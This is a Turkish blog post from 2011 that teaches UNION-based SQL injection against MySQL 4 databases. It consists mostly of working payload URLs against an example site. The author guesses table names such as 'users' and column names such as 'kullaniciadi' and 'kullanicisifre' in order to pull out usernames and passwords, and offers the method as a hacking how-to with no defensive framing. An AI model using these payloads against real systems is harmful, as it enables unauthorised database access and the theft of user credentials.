Sql İnjection'da version bulmayı önceki yazılarda anlatmıştım. Şimdi version bulduktan sonra izleyeceğimiz yol versiona göre değişir. Bu yazıda 4 versionu anlatacağım. Version 4 de olay tahmin işidir. Table ve column adlarını tahmin ederek veri çekebiliriz. Biraz sabır işi ancak uğraşınca işin zevkine varacaksınız. Hemen örnekleyelim ve sayılar şöyle ekrana yansımış olsun;
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6--
(Şimdi "from" komutunu kullanarak table adını bulup veri çekeceğiz)
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+admin--
(admin bilgilerinin bulunduğu table'ı bulmamız gerekiyor. İlk olarak admin denedim. Site hata verdi ve sayılar ekrana yansımadı)
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+admins--
(yine sayılar ekrana yansımadı. Sayılar ekrana yansıyana kadar devam edeceğiz.)
orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+user--
(Hala yansımadı.)
orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+users--
(Evet şimdi sayılar ekrana yansıdı.Sizde sayılar ekrana yansımazsa "member,members,administrator,administrator vs." gibi türetin.Diyelim ki 3 ve 5 ekrana yansıdı. 3'ün veya 5'in yerine kolon adlarını yazarak kolon adlarını tahmin edeceğiz.) Şöyle ki;
-orneksite.com/ders.php?id=-1+union+select+1,2,username,4,5,6+from+users--
(hata verdi o zaman değiştiriyoruz)
-orneksite.com/ders.php?id=-1+union+select+1,2,kullaniciadi,4,5,6+from+users--
(kullanıcı adı çıktı.Şimdi şifreye geçelim)
-orneksite.com/ders.php?id=-1+union+select+1,2,kullaniciadi,4,kullanicisifre,6+from+users--
(şifre ve kullanıcı adı çıktı.)
Daha sonra table ve kolon isimlerini text dosyası olarak upload edeceğim. Takipte kalın.
13 Mayıs 2011 Cuma
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder